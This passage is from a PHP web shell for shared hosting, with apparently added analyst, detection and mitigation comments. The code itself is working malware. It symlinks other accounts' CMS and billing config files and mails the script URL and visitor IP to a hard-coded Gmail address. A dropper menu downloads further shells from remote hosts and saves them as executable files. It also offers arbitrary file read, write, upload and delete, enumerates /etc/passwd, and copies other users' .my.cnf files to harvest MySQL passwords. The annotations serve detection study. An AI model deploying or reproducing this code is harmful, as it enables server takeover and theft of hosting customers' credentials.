  1555. @symlink('/home/'.$user.'/public_html/forums/Settings.php',$user.'~~>smf-forums'.$type.'');
  1556. @symlink('/home/'.$user.'/public_html/upload/includes/config.php',$user.'~~>upload'.$type.'');
  1557. @symlink('/home/'.$user.'/public_html/incl/config.php',$user.'~~>malay'.$type.'');
  1558. @symlink('/home/'.$user.'/public_html/clientes/configuration.php',$user.'~~>clents'.$type.'');
  1559. @symlink('/home/'.$user.'/public_html/cliente/configuration.php',$user.'~~>client2'.$type.'');
  1560. @symlink('/home/'.$user.'/public_html/clientsupport/configuration.php',$user.'~~>client'.$type.'');
  1561. @symlink('/home/'.$user.'/public_html/config/koneksi.php',$user.'~~>lokomedia'.$type.'');
  1562. @symlink('/home/'.$user.'/public_html/admin/config.php',$user.'~~>webconfig'.$type.'');
  1563. @symlink('/home/'.$user.'/public_html/admin/conf.php',$user.'~~>webconfig2'.$type.'');
  1564. @symlink('/home/'.$user.'/public_html/system/sistem.php',$user.'~~>lokomedia1'.$type.'');
  1565. @symlink('/home/'.$user.'/public_html/sites/default/settings.php',$user.'~~>Drupal'.$type.'');
  1566. @symlink('/home/'.$user.'/public_html/e107_config.php',$user.'~~>e107'.$type.'');
  1567. @symlink('/home/'.$user.'/public_html/datas/config.php',$user.'~~>Seditio'.$type.'');
  1568. @symlink('/home/'.$user.'/public_html/article/config.php',$user.'~~>Nwahy'.$type.'');
  1569. @symlink('/home/'.$user.'/public_html/connect.php',$user.'~~>PHP-Fusion'.$type.'');
  1570. @symlink('/home/'.$user.'/public_html/includes/config.php',$user.'~~>traidnt1'.$type.'');
  1571. @symlink('/home/'.$user.'/public_html/config.php',$user.'~~>4images'.$type.'');
  1572. @symlink('/home/'.$user.'/public_html/member/configuration.php',$user.'~~>1member'.$type.'') ;
  1573. @symlink('/home/'.$user.'/public_html/requires/config.php',$user.'~~>AM4SS-hosting'.$type.'');
  1574. @symlink('/home/'.$user.'/public_html/supports/includes/iso4217.php',$user.'~~>hostbills-supports'.$type.'');
  1575. @symlink('/home/'.$user.'/public_html/client/includes/iso4217.php',$user.'~~>hostbills-client'.$type.'');
  1576. @symlink('/home/'.$user.'/public_html/support/includes/iso4217.php',$user.'~~>hostbills-support'.$type.'');
  1577. @symlink('/home/'.$user.'/public_html/billing/includes/iso4217.php',$user.'~~>hostbills-billing'.$type.'');
  1578. @symlink('/home/'.$user.'/public_html/billings/includes/iso4217.php',$user.'~~>hostbills-billings'.$type.'');
  1579. @symlink('/home/'.$user.'/public_html/host/includes/iso4217.php',$user.'~~>hostbills-host'.$type.'');
  1580. @symlink('/home/'.$user.'/public_html/hosts/includes/iso4217.php',$user.'~~>hostbills-hosts'.$type.'');
  1581. @symlink('/home/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'~~>hostbills-hosting'.$type.'');
  1582. @symlink('/home/'.$user.'/public_html/hostings/includes/iso4217.php',$user.'~~>hostbills-hostings'.$type.'');
  1583. @symlink('/home/'.$user.'/public_html/includes/iso4217.php',$user.'~~>hostbills'.$type.'');
  1584. @symlink('/home/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'~~>hostbills-hostbills'.$type.'');
  1585. @symlink('/home/'.$user.'/public_html/hostbill/includes/iso4217.php',$user.'~~>hostbills-hostbill'.$type.'');
  1586. @symlink('/home/'.$user.'/public_html/billing/configuration.php',$user.'~~>billing'.$type.'');
  1587. @symlink('/home/'.$user.'/public_html/manage/configuration.php',$user.'~~>whm-manage'.$type.'');
  1588. @symlink('/home/'.$user.'/public_html/my/configuration.php',$user.'~~>whm-my'.$type.'');
  1589. @symlink('/home/'.$user.'/public_html/myshop/configuration.php',$user.'~~>whm-myshop'.$type.'');
  1590. @symlink('/home/'.$user.'/public_html/secure/whm/configuration.php',$user.'~~>sucure-whm'.$type.'');
  1591. @symlink('/home/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'~~>sucure-whmcs'.$type.'');
  1592. } // Mitigation: config files readable only by their owner, plus per-account filesystem isolation, leave these links unreadable
  1593. echo 'Selesai mas/mba bro untuk melihat hasilnya klik ~~> <blink><a href='.$folfig.'>'.$folfig.'</a></blink>';
  1594. }
  1595. }
  1596. ?>
  1597. <?php
  1598. @ini_set('output_buffering', 0); // Analyst note: this run is a "phone home" notification to the script's author
  1599. @ini_set('display_errors', 0);
  1600. set_time_limit(0);
  1601. ini_set('memory_limit', '64M');
  1602. header('Content-Type: text/html; charset=UTF-8');
  1603. $tujuanmail = 'kefiex403@gmail.com'; // hard-coded recipient of the message below
  1604. $x_path = "http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI']; // URL under which this script was requested
  1605. $pesan_alert = "fix $x_path :p *IP Address : [ " . $_SERVER['REMOTE_ADDR'] . " ]"; // body: script URL plus the requesting client's IP
  1606. mail($tujuanmail, "Maho", $pesan_alert, "[ " . $_SERVER['REMOTE_ADDR'] . " ]"); // sent on every request that reaches this point. Detection: MTA logs showing web-user mail with subject "Maho" to this recipient
  1607. ?>
  1608. <?php
  1609. if (isset($_GET['idb']) && ($_GET['idb'] == 'auto')) { // Analyst note: second-stage dropper menu
  1610. ?>
  1611. <form action="?&amp;idb=auto" method="post">
  1612. <?php
  1613. echo "<html><head><title>MATAMU PICEK !!!!</title>";
  1614. echo "<body bgcolor='black'>";
  1615. echo "<center><h1><font color='blue'>IndahNya Berbagi<br/>IDB-TE4M</font></center></head>
  1616. </h1><hr><br/>";
  1617. echo "<font color='yellow'><center>-=[ IDBTE4M ]=- -=[ HGL10]=- -=[ BN ]=-</center></font><br/><br/><form method='POST'>";
  1618. echo "<font size='6' color='blue'><center>MINTA IJIN DULU SAMA SERVER</center></font><br/>";
  1619. echo "<div align='center'>";
  1620. echo "<input type='submit' name='idb' value='IJIN SERVER'><br/> <br/>";
  1621. echo "</div>";
  1622. echo "<font size='5' color='blue'><center>PILIH SALAH SATU VERSI CGI DIBAWAH</center></font><br/>";
  1623. echo "<div align='center'>";
  1624. echo "<input type='submit' name='te4m' value='-=[ HsH ]=-'> ";
  1625. echo "<input type='submit' name='te4m1' value='-=[ AUTO ]=-'> ";
  1626. echo "<input type='submit' name='te4m2' value='-=[ WHM KILL ]=-'> ";
  1627. echo "<input type='submit' name='te4m3' value='-=[ DM SHELL ]=-'> ";
  1628. echo "<input type='submit' name='te4m4' value='-=[ BN CGI ]=-'></p> ";
  1629. echo "<input type='submit' name='te4m5' value='-=[ SABUN ]=-'></p> ";
  1630. echo "<input type='submit' name='te4m6' value='-=[ WHMCS KILL ]=-'></p> ";
  1631. echo "<input type='submit' name='te4m7' value='-=[ TES ]=-'></p> ";
  1632. echo "</div>";
  1633. // The function name is kept in a string and invoked as $sh(...), so the handlers below contain no literal
  1634. // file_get_contents( call; signature scans should also cover variable-function calls on remote URLs.
  1635. $sh = 'file_get_contents';
  1636. // 'idb' button: writes a php.ini into the working directory. Whether it is honoured depends on the PHP handler in use.
  1637. if($_POST['idb']) {
  1638. $ini = "php.ini";
  1639. $open = fopen($ini, 'w');
  1640. $source = ("safe_mode = OFF n
  1641. disable_functions = NONE n
  1642. safe_mode_gid = OFF n
  1643. open_basedir = OFF n
  1644. register_globals = ON n
  1645. exec = ON n
  1646. shell_exec = ON n");
  1647. fwrite($open, $source);
  1648. echo "<font color='lime'>";
  1649. if($open) {
  1650. echo '<hr><p>ijin diterima, silahkan pilih tools sesuai keinginan :) </p>';
  1651. }
  1652. else {
  1653. echo "<font color='blue'>";
  1654. echo '<hr><p>GAGAL kang </p>';
  1655. echo "</font>";
  1656. fclose($open);
  1657. } }
  1658. // Each te4m* handler below fetches the URL in $cgi and writes the response body to a local file with mode 0755.
  1659. if($_POST['te4m']) {
  1660. $cgi = 'http://el-ro.yu.tl/files/in.zip';
  1661. $get11 = $sh($cgi);
  1662. $idbk = fopen('hsh.php', 'w');
  1663. fwrite($idbk,$get11);
  1664. fclose($idbk);
  1665. {
  1666. @chmod('hsh.php',0755);
  1667. }
  1668. echo "<font color='aqua'>";
  1669. echo "<hr>shell hsh sukses dibuat :D <br/>
  1670. Silahkan kunjungi http://alamat-domain-kamu/hsh.php atau lihat hasilnya <a href='hsh.php' target='_blank'>DISINI</a></center></br>";
  1671. echo "</font>";
  1672. }
  1673. echo "</font>";
  1674. // Detection: outbound HTTP from the web server to the hosts named in $cgi, and newly created hsh.php, info.php,
  1675. if($_POST['te4m1']) { // whm.php, links.php, sabun.php, bn.php or .pl beside this script
  1676. $cgi = 'http://el-ro.yu.tl/files/beiz.zip';
  1677. $get11 = $sh($cgi);
  1678. $idbk = fopen('info.php', 'w');
  1679. fwrite($idbk,$get11);
  1680. fclose($idbk);
  1681. {
  1682. @chmod('info.php',0755);
  1683. }
  1684. echo "<font color='aqua'>";
  1685. echo "<hr>tools sukses dibuat :D <br/>
  1686. Silahkan kunjungi http://alamat-domain-kamu/info.php atau lihat hasilnya <a href='info.php' target='_blank'>DISINI</a></center></br>";
  1687. echo "</font>";
  1688. }
  1689. echo "</font>";
  1690. // Mitigation: allow_url_fopen = Off and egress filtering stop the fetch; a web root the PHP user cannot write stops the drop.
  1691. if($_POST['te4m2']) {
  1692. $cgi = 'http://el-ro.yu.tl/files/whm.zip';
  1693. $get11 = $sh($cgi);
  1694. $idbk = fopen('whm.php', 'w');
  1695. fwrite($idbk,$get11);
  1696. fclose($idbk);
  1697. {
  1698. @chmod('whm.php',0755);
  1699. }
  1700. echo "<font color='aqua'>";
  1701. echo "<hr>whm killer sukses dibuat :D <br/>
  1702. Silahkan kunjungi http://alamat-domain-kamu/whm.php atau lihat hasilnya <a href='whm.php' target='_blank'>DISINI</a></center></br>";
  1703. echo "</font>";
  1704. }
  1705. echo "</font>";
  1706.  
  1707. if($_POST['te4m3']) {
  1708. $cgi = 'http://el-ro.yu.tl/files/dm.zip';
  1709. $get11 = $sh($cgi);
  1710. $idbk = fopen('links.php', 'w');
  1711. fwrite($idbk,$get11);
  1712. fclose($idbk);
  1713. {
  1714. @chmod('links.php',0755);
  1715. }
  1716. echo "<font color='aqua'>";
  1717. echo "<hr>shell DM sukses dibuat :D <br/>
  1718. Silahkan kunjungi http://alamat-domain-kamu/links.php atau lihat hasilnya <a href='links.php' target='_blank'>DISINI</a></center></br>";
  1719. echo "</font>";
  1720. }
  1721. echo "</font>";
  1722. if($_POST['te4m5']) {
  1723. $cgi = 'http://kefiex.yu.tl/files/sabun.zip';
  1724. $get11 = $sh($cgi);
  1725. $idbk = fopen('sabun.php', 'w');
  1726. fwrite($idbk,$get11);
  1727. fclose($idbk);
  1728. {
  1729. @chmod('sabun.php',0755);
  1730. }
  1731. echo "<font color='aqua'>";
  1732. echo "<hr>sabun massal :D <br/>
  1733. Silahkan kunjungi http://alamat-domain-kamu/sabun.php atau lihat hasilnya <a href='sabun.php' target='_blank'>DISINI</a></center></br>";
  1734. echo "</font>";
  1735. }
  1736. echo "</font>";
  1737. if($_POST['te4m6']) {
  1738. $cgi = 'http://kefiex.yu.tl/files/olenk.zip';
  1739. $get11 = $sh($cgi);
  1740. $idbk = fopen('bn.php', 'w');
  1741. fwrite($idbk,$get11);
  1742. fclose($idbk);
  1743. {
  1744. @chmod('bn.php',0755);
  1745. }
  1746. echo "<font color='aqua'>";
  1747. echo "<hr>config kill :D <br/>
  1748. Silahkan kunjungi http://alamat-domain-kamu/bn.php atau lihat hasilnya <a href='bn.php' target='_blank'>DISINI</a></center></br>";
  1749. echo "</font>";
  1750. }
  1751. echo "</font>";
  1752. if($_POST['te4m4']) {
  1753. $cgi = 'http://kefiex.yu.tl/files/b.zip';
  1754. $get11 = $sh($cgi);
  1755. $idb1k = fopen('.pl', 'w');
  1756. fwrite($idb1k,$get11);
  1757. fclose($idb1k);
  1758. {
  1759. @chmod('.pl',0755);
  1760. }
  1761. echo "<font color='aqua'>";
  1762. echo "<hr>CGIProxy sukses dibuat :D <br/>
  1763. Silahkan kunjungi http://alamat-domain-kamu/.pl atau lihat hasilnya <a href='.pl' target='_blank'>DISINI</a></center></br>";
  1764. echo "</font>";
  1765. }
  1766. echo "</font>";
  1767. if($_POST['te4m7']) {
  1768. $cgi = 'http://kefiex.yu.tl/files/hsh.zip';
  1769. $get11 = $sh($cgi);
  1770. $idb1k = fopen('hsh.zip', 'get');
  1771. fwrite($idb1k,$get11);
  1772. fclose($idb1k);
  1773. {
  1774. @chmod('hsh',0755);
  1775. }
  1776. echo "<font color='aqua'>";
  1777. echo "<hr>CGIProxy sukses dibuat :D <br/>
  1778. Silahkan kunjungi http://alamat-domain-kamu/.pl atau lihat hasilnya <a href='hsh' target='_blank'>DISINI</a></center></br>";
  1779. echo "</font>";
  1780. }
  1781. echo "</font>";
  1782. }
  1783. ?>
  1784. <?php
  1785. if (isset($_GET['idb']) && ($_GET['idb'] == 'domain')) { ?>
  1786. <form action="?idb=domain" method="post">
  1787.  
  1788. <?php
  1789. echo '<br><br></center><br><br><div class=content>'; // Analyst note: this view lists every hosted domain with its owning account
  1790. $file = @implode(@file("/etc/named.conf")); // whole file joined into one string
  1791. if (!$file) {
  1792. die("can't ReaD -> [ /etc/named.conf ");
  1793. }
  1794. preg_match_all("#named/(.*?).db#", $file, $r); // captures the <domain> part of zone file names of the form named/<domain>.db
  1795. $domains = array_unique($r[1]);
  1796. //check();
  1797. //if(isset($_GET['ShowAll']))
  1798. {
  1799. echo "<table align=center border=1 width=59% cellpadding=5>
  1800. <tr><td colspan=2>[+] ADA [ <b>" . count($domains) . "</b> ] DOMAIN</td></tr>
  1801. <tr><td>Domain</td><td>User</td></tr>";
  1802. foreach ($domains as $domain) {
  1803. $user = posix_getpwuid(@fileowner("/etc/valiases/" . $domain)); // account name = owner of /etc/valiases/<domain>
  1804. echo "<tr><td>$domain</td><td>" . $user['name'] . "</td></tr>";
  1805. }
  1806. echo "</table>";
  1807. } // Mitigation: the listing depends on /etc/named.conf and /etc/valiases being readable by the web user; restrict that where the platform allows
  1808. echo '</div>';
  1809. }
  1810. ?>
  1811. <?php
  1812. if (isset($_GET['idb']) && ($_GET['idb'] == 'sql')) { // Analyst note: drops a database manager at s/db.php on first use
  1813. echo "<center><br/><br/><nobr><b><span class='b7'>O=:[ MYSQL</span> <span class='b8'>MANAGER ]:=O</span></b></nobr><br/><br/> ";
  1814. echo "</br></br><center><b><span class='b11'> You Can Go To : <a href='s/db.php' target='_blank'>[+] HERE [+]</a></center></span></br>";
  1815. if (!is_dir('s')) {
  1816. $mk = @mkdir('s', 0777); // Detection: a world-writable directory named 's' beside the script
  1817. @fwrite($f, $c); // neither $f nor $c is assigned in this branch
  1818. $f2 = @fopen('s/db.php', 'w');
  1819. $sml_db = ""; // the embedded payload is empty in this copy, so s/db.php is created with no content
  1820. $write = fwrite($f2, base64_decode($sml_db));
  1821. if ($write) {
  1822. @chmod('s/db.php', 0755);
  1823. }
  1824. echo "</br></br><center><b>GO TO : <a href='s/db.php' target='_blank'>[+] MYSQL MANAGER [+]</a></center></br>";
  1825. }
  1826. }
  1827. ?>
  1828. <center>
  1829. <?php
  1830. echo '<p><table class="explore"><tr>
  1831. <table width="700" border="0" cellpadding="3" cellspacing="1">
  1832. <tr><td>Path : ';
  1833. if(isset($_GET['path'])){ // Analyst note: the browsed directory comes straight from the 'path' query parameter
  1834. $path = $_GET['path'];
  1835. }else{
  1836. $path = getcwd();
  1837. }
  1838. $path = str_replace('\\','/',$path); // backslashes are normalised to forward slashes
  1839. $paths = explode('/',$path);
  1840. // Prints one link per path component, each pointing at the cumulative prefix up to that component.
  1841. foreach($paths as $id=>$pat){
  1842. if($pat == '' && $id == 0){
  1843. $a = true;
  1844. echo '<a href="?path=/">/</a>';
  1845. continue;
  1846. }
  1847. if($pat == '') continue;
  1848. echo '<a href="?path=';
  1849. for($i=0;$i<=$id;$i++){
  1850. echo "$paths[$i]";
  1851. if($i != $id) echo "/";
  1852. }
  1853. echo '">'.$pat.'</a>/';
  1854. } // Detection: access-log entries for this script carrying ?path= with absolute directories outside the site root
  1855. echo '</td></tr><tr><td></div></div>';
  1856. }
  1857. if(isset($_FILES['file'])){ // Analyst note: unrestricted upload - no check on file name, type or size
  1858. if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){ // target directory is $path (set above from 'path' or getcwd(), when that branch ran); the file name is client-supplied
  1859. echo '<font color="green">File Upload Done.</font><br />';
  1860. }else{
  1861. echo '<font color="blue">File Upload Error.</font><br />';
  1862. }
  1863. } // Detection: multipart POSTs to this script followed by new files in the addressed directory. Mitigation: directories the PHP user cannot write
  // File-manager dispatcher. Every path and value below is taken directly from
  // $_GET/$_POST with no validation, and most are echoed back without HTML
  // escaping. Parameters worth hunting for in web/WAF logs: query `path`,
  // `filesrc`, `option`; POST `opt` (chmod, rename, edit, delete), `perm`,
  // `newname`, `src`, `type`, `name`, `path`.
  1864. if(isset($_GET['filesrc'])){
  // Arbitrary file read: prints the contents of whatever path `filesrc` names.
  // Only the file contents are HTML-escaped; the path itself is echoed raw.
  1865. echo "<tr><td>Current File : ";
  1866. echo $_GET['filesrc'];
  1867. echo '</tr></td></table><br />';
  1868. echo('<pre>'.htmlspecialchars(file_get_contents($_GET['filesrc'])).'</pre>');
  1869. }elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){
  // Non-delete operations on the request-supplied $_POST['path'].
  1870. echo '</table><br /><center>'.$_POST['path'].'<br /><br />';
  1871. if($_POST['opt'] == 'chmod'){
  // chmod: applies the posted `perm` value to the path, then re-renders the
  // form pre-filled with the last four octal digits of the current mode.
  1872. if(isset($_POST['perm'])){
  1873. if(chmod($_POST['path'],$_POST['perm'])){
  1874. echo '<font color="green">Change Permission Done.</font><br />';
  1875. }else{
  1876. echo '<font color="blue">Change Permission Error.</font><br />';
  1877. }
  1878. }
  1879. echo '<form method="POST">
  1880. Permission : <input name="perm" type="text" size="4" value="'.substr(sprintf('%o', fileperms($_POST['path'])), -4).'" />
  1881. <input type="hidden" name="path" value="'.$_POST['path'].'">
  1882. <input type="hidden" name="opt" value="chmod">
  1883. <input type="submit" value="Go" />
  1884. </form>';
  1885. }elseif($_POST['opt'] == 'rename'){
  // rename: moves $_POST['path'] to $path/<newname>; `newname` is not
  // restricted, so it can contain directory separators.
  1886. if(isset($_POST['newname'])){
  1887. if(rename($_POST['path'],$path.'/'.$_POST['newname'])){
  1888. echo '<font color="green">Change Name Done.</font><br />';
  1889. }else{
  1890. echo '<font color="blue">Change Name Error.</font><br />';
  1891. }
  1892. $_POST['name'] = $_POST['newname'];
  1893. }
  1894. echo '<form method="POST">
  1895. New Name : <input name="newname" type="text" size="20" value="'.$_POST['name'].'" />
  1896. <input type="hidden" name="path" value="'.$_POST['path'].'">
  1897. <input type="hidden" name="opt" value="rename">
  1898. <input type="submit" value="Go" />
  1899. </form>';
  1900. }elseif($_POST['opt'] == 'edit'){
  // edit: arbitrary file write. Opens the path in 'w' mode (truncating it) and
  // writes the posted `src` verbatim. Unexpected mtime/content changes on
  // application files are the on-disk trace of this branch.
  1901. if(isset($_POST['src'])){
  1902. $fp = fopen($_POST['path'],'w');
  1903. if(fwrite($fp,$_POST['src'])){
  1904. echo '<font color="green">Edit File Done.</font><br />';
  1905. }else{
  1906. echo '<font color="blue">Edit File Error.</font><br />';
  1907. }
  1908. fclose($fp);
  1909. }
  1910. echo '<form method="POST">
  1911. <textarea cols=80 rows=20 name="src">'.htmlspecialchars(file_get_contents($_POST['path'])).'</textarea><br />
  1912. <input type="hidden" name="path" value="'.$_POST['path'].'">
  1913. <input type="hidden" name="opt" value="edit">
  1914. <input type="submit" value="Go" />
  1915. </form>';
  1916. }
  1917. echo '</center>';
  1918. }else{
  // Default view: an optional delete (rmdir for type `dir`, unlink for type
  // `file`), followed by a listing of $path.
  1919. echo '</table><br /><center>';
  1920. if(isset($_GET['option']) && $_POST['opt'] == 'delete'){
  1921. if($_POST['type'] == 'dir'){
  1922. if(rmdir($_POST['path'])){
  1923. echo '<font color="green">Delete Dir Done.</font><br />';
  1924. }else{
  1925. echo '<font color="blue">Delete Dir Error.</font><br />';
  1926. }
  1927. }elseif($_POST['type'] == 'file'){
  1928. if(unlink($_POST['path'])){
  1929. echo '<font color="green">Delete File Done.</font><br />';
  1930. }else{
  1931. echo '<font color="blue">Delete File Error.</font><br />';
  1932. }
  1933. }
  1934. }
  1935. echo '</center>';
  // Listing: directories first, then regular files. Each row carries a form that
  // posts back to `?option&path=...` with hidden `type`, `name` and `path`.
  // $path and the entry names are interpolated into the HTML unescaped.
  1936. $scandir = scandir($path);
  1937. echo '<div id="content"><table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
  1938. <tr class="first">
  1939. <td><center>Name</center></td>
  1940. <td><center>Size</center></td>
  1941. <td><center>Permissions</center></td>
  1942. <td><center>Options</center></td>
  1943. </tr>';
  1944.  
  1945. foreach($scandir as $dir){
  1946. if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue;
  1947. echo "<tr>
  1948. <td><a href=\"?path=$path/$dir\">$dir</a></td>
  1949. <td><center>--</center></td>
  1950. <td><center>";
  // Colour cue: green when the entry is writable, blue when it is unreadable.
  1951. if(is_writable("$path/$dir")) echo '<font color="green">';
  1952. elseif(!is_readable("$path/$dir")) echo '<font color="blue">';
  1953. echo perms("$path/$dir");
  1954. if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo '</font>';
  1955.  
  1956. echo "</center></td>
  1957. <td><center><form method=\"POST\" action=\"?option&path=$path\">
  1958. <select name=\"opt\">
  1959. <option value=\"\"></option>
  1960. <option value=\"delete\">Delete</option>
  1961. <option value=\"chmod\">Chmod</option>
  1962. <option value=\"rename\">Rename</option>
  1963. </select>
  1964. <input type=\"hidden\" name=\"type\" value=\"dir\">
  1965. <input type=\"hidden\" name=\"name\" value=\"$dir\">
  1966. <input type=\"hidden\" name=\"path\" value=\"$path/$dir\">
  1967. <input type=\"submit\" value=\">\" />
  1968. </form></center></td>
  1969. </tr>";
  1970. }
  1971. echo '<tr class="first"><td></td><td></td><td></td><td></td></tr>';
  1972. foreach($scandir as $file){
  1973. if(!is_file("$path/$file")) continue;
  // Size is shown in KB (3 decimals) and switches to MB from 1024 KB upward.
  1974. $size = filesize("$path/$file")/1024;
  1975. $size = round($size,3);
  1976. if($size >= 1024){
  1977. $size = round($size/1024,2).' MB';
  1978. }else{
  1979. $size = $size.' KB';
  1980. }
  1981.  
  1982. echo "<tr>
  1983. <td><a href=\"?filesrc=$path/$file&path=$path\">$file</a></td>
  1984. <td><center>".$size."</center></td>
  1985. <td><center>";
  1986. if(is_writable("$path/$file")) echo '<font color="green">';
  1987. elseif(!is_readable("$path/$file")) echo '<font color="blue">';
  1988. echo perms("$path/$file");
  1989. if(is_writable("$path/$file") || !is_readable("$path/$file")) echo '</font>';
  1990. echo "</center></td>
  1991. <td><center><form method=\"POST\" action=\"?option&path=$path\">
  1992. <select name=\"opt\">
  1993. <option value=\"\"></option>
  1994. <option value=\"delete\">Delete</option>
  1995. <option value=\"chmod\">Chmod</option>
  1996. <option value=\"rename\">Rename</option>
  1997. <option value=\"edit\">Edit</option>
  1998. </select>
  1999. <input type=\"hidden\" name=\"type\" value=\"file\">
  2000. <input type=\"hidden\" name=\"name\" value=\"$file\">
  2001. <input type=\"hidden\" name=\"path\" value=\"$path/$file\">
  2002. <input type=\"submit\" value=\">\" />
  2003. </form></center></td>
  2004. </tr>";
  2005. }
  2006. echo '</table>
  2007. </div></tr>';
  2008. }
  2009. echo '
  2010. </BODY>
  2011. </HTML>';
  /**
   * Render a file's mode as an `ls -l`-style string: one type character
   * followed by three rwx triples (setuid/setgid/sticky folded into the
   * execute position).
   *
   * @param string $file Path handed to fileperms().
   * @return string Ten-character mode string such as "-rw-r--r--".
   */
  function perms($file){
      $mode = fileperms($file);

      // File-type masks, tested in the same order as a first-match chain.
      $typeTable = array(
          0xC000 => 's', // socket
          0xA000 => 'l', // symbolic link
          0x8000 => '-', // regular file
          0x6000 => 'b', // block special
          0x4000 => 'd', // directory
          0x2000 => 'c', // character special
          0x1000 => 'p', // FIFO pipe
      );

      $out = 'u'; // unknown unless a mask matches
      foreach ($typeTable as $mask => $letter) {
          if (($mode & $mask) == $mask) {
              $out = $letter;
              break;
          }
      }

      // read bit, write bit, execute bit, special bit, letter with exec, letter without exec
      $classes = array(
          array(0x0100, 0x0080, 0x0040, 0x0800, 's', 'S'), // owner / setuid
          array(0x0020, 0x0010, 0x0008, 0x0400, 's', 'S'), // group / setgid
          array(0x0004, 0x0002, 0x0001, 0x0200, 't', 'T'), // world / sticky
      );

      foreach ($classes as $bits) {
          list($r, $w, $x, $special, $withExec, $withoutExec) = $bits;
          $out .= ($mode & $r) ? 'r' : '-';
          $out .= ($mode & $w) ? 'w' : '-';
          if ($mode & $x) {
              $out .= ($mode & $special) ? $withExec : 'x';
          } else {
              $out .= ($mode & $special) ? $withoutExec : '-';
          }
      }

      return $out;
  }
  2064. ?>
  2065. <?php
  // `?idb=salto`: local account enumeration on a shared host. Reads
  // /etc/passwd, derives a user name from each line and reports every
  // /home/<user>/public_html/ that the web-server account can read.
  // Mitigation on shared hosting is per-account isolation (home directories not
  // readable by other accounts, PHP confined with open_basedir or per-user
  // execution) so that this readability test fails.
  2066. if (isset($_GET['idb']) && ($_GET['idb'] == 'salto')) {
  2067. ?>
  2068. <form action="?&amp;idb=salto" method="post">
  2069. <?php
  2070. set_time_limit(0);
  2071. @$passwd = fopen('/etc/passwd','r');
  2072. if (!$passwd) { die('<b>[+] ERROR | GA BISA BACA /etc/passwd [+]</b>'); }
  2073. $pub = array();
  2074. $users = array();
  2075. $conf = array();
  2076. $i = 0;
  2077. while(!feof($passwd))
  2078. {
  2079. $str = fgets($passwd);
  // Lines 0-10 are skipped; presumably to pass over system accounts -- the
  // code does not check UIDs.
  2080. if ($i > 10)
  2081. {
  // User name = text before the first ':' of the passwd line.
  2082. $pos = strpos($str,':');
  2083. $username = substr($str,0,$pos);
  2084. $dirz = '/home/'.$username.'/public_html/';
  2085. if (($username != ''))
  2086. {
  2087. if (is_readable($dirz))
  2088. {
  2089. array_push($users,$username);
  2090. array_push($pub,$dirz);
  2091. }
  2092. }
  2093. }
  2094. $i++;
  2095. }
  2096. echo '<br><br>';
  2097. echo "<center><b>[+] KETEMU ".sizeof($pub)." MAHO"." [+]</b><br/><br/>";
  // Each readable web root is emitted as a link back into this script with a
  // `y` query parameter (`&#61;` is the HTML entity for '=').
  2098. foreach ($users as $user)
  2099. {
  2100. $path = "/home/$user/public_html/";
  2101. echo "<a href='?y&#61;$path' target='_blank' style='font-weight:bold; color:#FFFFFF;'>$path</a><br>";
  2102. }
  2103. echo "<br>";
  2104. echo '</center></body></html>';
  2105. }
  2106.  
  2107. ?>
  2108. <?php
  // `?idb=cp`: harvests MySQL client credentials of other accounts on a shared
  // host. Domains are taken from /var/named/*.db (or zone lines in
  // /etc/named.conf), mapped to an account via the owner of
  // /etc/valiases/<domain>, and each readable /home/<user>/.my.cnf is copied
  // into the script's working directory as <user>.txt.
  // Incident response: look for <user>.txt files next to the script (they hold
  // copied credentials and are reachable over HTTP), rotate every password
  // found in them, and check why other accounts' .my.cnf files were readable.
  2109. if (isset($_GET['idb']) && ($_GET['idb'] == 'cp')) {
  2110. ?>
  2111. <form action="?&amp;idb=cp" method="post">
  2112. <?php
  2113. /**
  2114. * @author: FaisaL Ahmed aka blue X
  2115. * @mail: me@faialahmed.me
  2116. * @Screenshot: http://prntscr.com/7c1p34
  2117. * @Last Updated: 01 June 2015
  2118. */
  2119.  
  2120. @ini_set('display_errors',0);
  // Returns the trimmed text found between two markers: splits $text on the
  // start marker, takes piece $i, and keeps what precedes the end marker.
  2121. function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1){
  2122. $ar0=explode($marqueurDebutLien, $text);
  2123. $ar1=explode($marqueurFinLien, $ar0[$i]);
  2124. return trim($ar1[0]);
  2125. }
  2126. echo "<center>";
  2127. $d0mains = @file('/etc/named.conf');
  2128. $domains = scandir("/var/named");
  2129.  
  2130. if ($domains or $d0mains)
  2131. {
  2132. $domains = scandir("/var/named");
  2133. if($domains) {
  // Path 1: domain list from the zone files in /var/named.
  2134. echo "<table align='center'><tr><th> COUNT </th><th> DOMAIN </th><th> USER </th><th> Password </th><th> .my.cnf </th></tr>";
  2135. $count=1;
  2136. $dc = 0;
  2137. $list = scandir("/var/named");
  2138. foreach($list as $domain){
  2139. if(strpos($domain,".db")){
  2140. $domain = str_replace('.db','',$domain);
  2141. $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
  2142. $dirz = '/home/'.$owner['name'].'/.my.cnf';
  2143. $path = getcwd();
  2144.  
  2145. if (is_readable($dirz)) {
  // Copies the victim's .my.cnf into the working directory, extracts the value
  // after `password="`, and prints it with a link to the domain on port 2082
  // and a link to the copied file.
  2146. copy($dirz, ''.$path.'/'.$owner['name'].'.txt');
  2147. $p=file_get_contents(''.$path.'/'.$owner['name'].'.txt');
  2148. $password=entre2v2($p,'password="','"');
  2149. echo "<tr><td>".$count++."</td><td><a href='http://".$domain.":2082' target='_blank'>".$domain."</a></td><td>".$owner['name']."</td><td>".$password."</td><td><a href='".$owner['name'].".txt' target='_blank'>Click Here</a></td></tr>";
  2150. $dc++;
  2151. }
  2152.  
  2153. }
  2154. }
  2155. echo '</table>';
  2156. $total = $dc;
  2157. echo '<br><div class="result">Total cPanel Found = '.$total.'</h3><br />';
  2158. echo '</center>';
  2159. }else{
  // Path 2: /var/named could not be listed, so domains are parsed from the
  // `zone "..."` lines of /etc/named.conf instead.
  2160. $d0mains = @file('/etc/named.conf');
  2161. if($d0mains) {
  2162. echo "<table align='center'><tr><th> COUNT </th><th> DOMAIN </th><th> USER </th><th> Password </th><th> .my.cnf </th></tr>";
